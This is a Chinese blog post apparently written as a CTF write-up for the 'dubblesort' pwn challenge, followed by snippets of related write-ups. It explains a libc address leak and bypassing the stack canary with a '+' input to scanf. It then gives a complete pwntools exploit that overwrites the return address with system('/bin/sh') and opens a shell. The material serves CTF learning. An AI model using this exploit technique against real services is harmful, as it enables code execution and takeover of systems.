dubblesort

最新推荐文章于 2022-05-15 01:03:17 发布
最新推荐文章于 2022-05-15 01:03:17 发布
阅读量522 收藏
点赞数
分类专栏: 栈溢出 堆溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41071646/article/details/97148065
版权

这个题目很好玩

看起来就是一个 排序的程序

然后这个题实际上也是一个 关于排序的程序

参考链接 

https://bbs.pediy.com/thread-228226.htm

这里没有想到的点就是怎么看找加载基址的 没有想到 可以通过哪里看得到 

还是对pwn的地址太敏感  

如果把加载地址给解决了 这个题目就很好办了

看一下程序

这里面的 排序很好看出来是冒泡排序

然后 看一下  有什么保护

基本保护全开了 ,。

然后 因为这里我们要用到栈溢出 所以要关心一下 这个 canary怎么绕过

这里 可以用 "+" 来绕过

因为 scanf 里面 会认为+8还是8

这两点确定了  其它就很好说了 只需要 排完的栈还能rop 就行

就是这里的 看偏移就可以了

这个题不算难

下面是exp

#coding:utf-8
from pwn import *

#io=remote("111.198.29.45",31926)
locall=1
if locall:
	io=process("./dubblesort")
else:
	io=remote("111.198.29.45",59084)
#111.198.29.45:43355
# 111.198.29.45:31926
elf=ELF("./dubblesort")

libc=ELF("/lib/i386-linux-gnu/libc-2.23.so")

def wirte_number(number):
	io.recvuntil("number : ")
	io.sendline(str(number))


if __name__=="__main__":
	io.recvuntil("What your name :")
	io.send("1"*28)
	io.recvuntil("1"*28)
	libc_base_addr=u32(io.recv(4))
	#gdb.attach(io)
	log.success('libc_base addr : 0x%x'%libc_base_addr)
	libc_base_addr=libc_base_addr-0x1b0244
	log.success('libc_base addr : 0x%x'%libc_base_addr)
	#gdb.attach(io)
	system_addr = libc_base_addr + libc.symbols['system']
	binsh_addr = libc_base_addr + libc.search('/bin/sh\x00').next()
	log.success('system addr : 0x%x'%system_addr)
	log.success('binsh addr : 0x%x'%binsh_addr)
	io.recvuntil("How many numbers do you what to sort :")
	io.sendline("35")
	for i in range(24):
		wirte_number(str(0))
	wirte_number("+")
	#gdb.attach(io)
	for i in range(9):
		wirte_number(str(system_addr))
	#gdb.attach(io)
	#pause()
	#raw_input()
	wirte_number(str(binsh_addr))
	print io.recv()
	io.interactive()
	io.close()

 

pipixia233333
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
dubblesort(xctf)
weixin_43868725的博客
08-26 377
0x0 程序保护和流程 保护: 流程: main() 存在一个问题,如果输入的数字个数过大会在输入数字的时候将栈中的数据覆盖。 0x1 利用过程 1.这个问题其实跟栈溢出差不多,题目又给出了libc,所以可以通过泄露libc的基地址计算出system函数的地址和/bin/sh字符串的地址。 2.因为buf在接收字符串之前没有清空里面可能存在垃圾数据,并且read函数输入的字符串不会加’\x00’进行截断所以可以通过buf泄露栈中的数据。 在输入’aaa\n’后可以看到栈中还有很多数据,可以通过输入0x
dubblesort记录
weixin_55190422的博客
11-24 312
查看下保护与它的架构。 这题考察的知识点是如何绕过canary和ret2libc。 我们分析一下main的C代码。read函数读取的时候不会在数据末尾加上’\x00’ , 这就导致了可以泄露栈上的libc地址,v9 没有进行边界检查, 导致输入的数据可以导致栈溢出 利用printf'\0'截断的特性来输出栈上残留数据,此处为.got.plt的地址,进而泄露libc基址 通过此处改变栈上数据,篡改retaddr为system函数地址,retaddr之后的位置存放"...
Dubble Sort Test
修也
03-17 379
#include"MyOutput.hpp" template<typename T> void swap(T *t1,T *t2){ T t = *t1; *t1 = *t2; *t2 = t; } template<typename T> void dubble_sort_optimized(T *t,int len){//effect not...
pwnable.tw dubblesort
weixin_30896511的博客
03-15 192
(留坑,远程没打成功) int __cdecl main(int argc, const char **argv, const char **envp) { int t_num_count; // eax int *num_stack; // edi unsigned int input_count; // esi unsigned int output_ptr; ...
攻防世界PWN之dubblesort题解
seaaseesa的博客
11-18 1109
dubblesort 首先看一下程序的保护机制 保护全开,并且是一个32位程序 然后,我们用IDA分析一下 这里,有两个漏洞 第一个是在调用read之前,没有调用memset对buf清空,因此,buf里可能之前会有一些残留的关键数据 第二个是,输入的整数个数没有上限,可以造成数据溢出,其实也就是栈溢出。 我们在read断点,然后观察栈中的数据,发现数据还未输入时,栈里就...
pwnable.tw dubblesort 经验总结
qq_43189757的博客
10-29 804
漏洞点: read函数读取的时候不会在数据末尾加上’\x00’ , 这就导致了可以泄露栈上的libc地址 v9 没有进行边界检查, 导致输入的数据可以导致栈溢出 写exp时碰到的问题: 1.IDA 生成的伪代码变量的表示位置出现问题 canary的值 显示是存放在esp + 0x7c 或 ebp - 0x10 上, 这两种应该都是指的同一地址, 但是实际调试的时候发现结果不一样 一开始是按...
C语言 BubbleSort
SmilngSalesman的博客
01-09 500
#include <stdio.h> #include <stdlib.h> #define N 5 int main() { int a[N]; int i, j, temp; for(i = 0; i < N; i++) scanf("%d", &a[i]); for(i = 1; i <= N - ...
[XCTF-pwn] 19-dubblesort
weixin_52640415的博客
03-03 174
冒泡排序。 漏洞: 对排序数字个数无限制 栈结构: 8个排序数字 16 名字 canary 其它7 libc_start_main_ret 思路: 输入 0*24,-,main*7,-,main 当canary小于main时排序结果为0*24, canary, main*8, libc_start_mian_ret。可以得到libc地址,并用main覆盖返回地址。回到main函数。 第2次输入0*24,canary*5,system*2,bin_sh排序后无变化,覆盖到返回地址 完整e
DubbleSort冒泡排序
qq_48974601的博客
09-12 93
package com.jt.pojo; import java.util.Arrays; public class DubbleSort { public static void main(String[] args) { int[] a = {5,4,3,2,1}; sort(a); System.out.println(Arrays.toString(a)); } public static int[] sort(int[]
pwnable.tw dubblesort 分析
weixin_30301183的博客
03-17 110
本系列为用于记录那些比较有意思的题目。 题目为一个排序算法,就如题目名称那样,dubblesort,32位程序。 利用思路为栈溢出,先是栈溢出泄露出栈上libc的相关数据从而获取libc地址,再是栈溢出覆盖ebp下一处劫持控制流。第二步时需要注意存在着一个canery需要绕过,可以使用scanf的%d输入为+时为没有输入的方式跳过(返回值会出错但本题没检查),就一个数字的长度,在第25个。 转...
基于NDIS中间层驱动的网络数据过滤程序开发概括
09-30
NDIS中间层驱动程序,基于DDK中passthru框架扩展。
Python 常用排序
医然
09-18 181
经典排序算法: def selecton_sort(p): """ 选择排序 p: 数字列表 """ for i in range(len(p) - 1): min = i for j in range(i + 1, len(p)): if p[min] > p[j]: ...
pwnable.tw - orw
不急不躁
07-09 3015
简单概览 与 start 不同,该程序使用动态链接 提示仅允许有限的系统调用 open read write 函数 程序运行 哪怕是输入一个字母,程序仍然会出现段错误 检查安全措施 可见栈上开了 CANARY 程序 在 IDA 中反编译可见: 函数 orw_seccomp 反编译: 程序从终端读入内容,存放在 shellcode,然后执行该命令 ...
stack2(xctf)
weixin_43868725的博客
05-26 709
0x0 程序保护和流程 保护: 流程: 当选择change number时没有对数组边界进行检查所以可以任意地址写。又在函数列表中发现一个hackhere() 0x1 利用过程 我们只需要通过数组写入这个函数的地址到main函数的返回地址处即可。简单计算一下。 v13这个数组首地址距离返回地址0x70+0x4,发现不行。然后用ida远程调试一下。输入了五个数字分别是1,2,3,4,5。offset=0xFFBDC56C-0xFFBDC4E8=0x84。 远程发现没有bash。 换成system(
攻防世界学习笔记2022.5.15
u014377094的博客
05-15 621
dubblesort 32位栈题,保护开的很全,有canary保护 canary处有偏移,并不是直接ebp+4 学习点: 1.使用+-号跳过scanf,防止对canary位修改 示例,如输入+,并不会对内容修改。 2. puts函数往往会存在利用,因为以0为结尾读取,所以往往拿来泄露地址。 该题采用泄露buf中的地址来获得libc基址。不过buf中为何会有关于这些的残留,暂且不知,可能是之前同等级函数调用时残留在栈中的数据? 3.关于脚本交互。 注意什么时候u32,什么时候str(),
pwnable tw Starbound writeup
charlie_heng的专栏
03-02 918
这题漏洞很明显,选择菜单的时候可以输入负数,然后可以在name那里填入想调用的函数,这样就可以实现任意地址执行 但是有了这个之后怎么用呢?? 这个就有点难度了,本来是想看一下栈,看看有没有可以用的参数,但是发现基本都用不了……. 然后想了下,这题没有给libc,又没有system,那么多半是ret2dl_resolve 那么ret2dl_resolve又需要rop,那么这题应该就是rop了...
pwnable.tw 1~5 心累
qq_42192672的博客
12-02 588
听说很难,来找虐 1.Start [100 pts] 之前湖湘杯有一题啥防护措施都没开启,我就不会做,所以不敢开心的太早 拖进IDA,这啥东西 还是直接看汇编吧 这是个系统调用 大概就是系统中断之后直接调用吧,边上有注释,不然我直接凉了 来,看一下汇编 先把地址给ecx,给了给长度范围,饭后执行标准输出,输出到终端,然后执行写操作 进入写函数以后,标准读入,长度还是2...
pwnable.tw第一题start
计算机小白的博客
08-09 5556
这应该是我做的第一道pwn的题了(虽然也是看了很多别人的WriteUp),想了两天,才终于弄清楚了,在这里记录一下。拿到手以后发现是一个ELF文件,就放进kali虚拟机里面运行一下先: 程序启动以后打印一段话,然后让你输入,就完事了。 再放入IDA中,观察: 检测栈有点问题,不能够F5,强行看汇编。。。 5个push是打印出来的那句话, Let’s start the CTF: 下面一句
pwnable.tw writeup
钞sir的博客
02-27 4057
start 这道题是静态编译的,或者可以理解是就是直接用汇编写的,所以这个程序很小,没有可以利用的函数; sir@sir-PC:~/desktop$ objdump -R start start: 文件格式 elf32-i386 objdump: start:不是动态对象 objdump: start: 无效的操作 反汇编代码: sir@sir-PC:~/desktop$ objdu...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值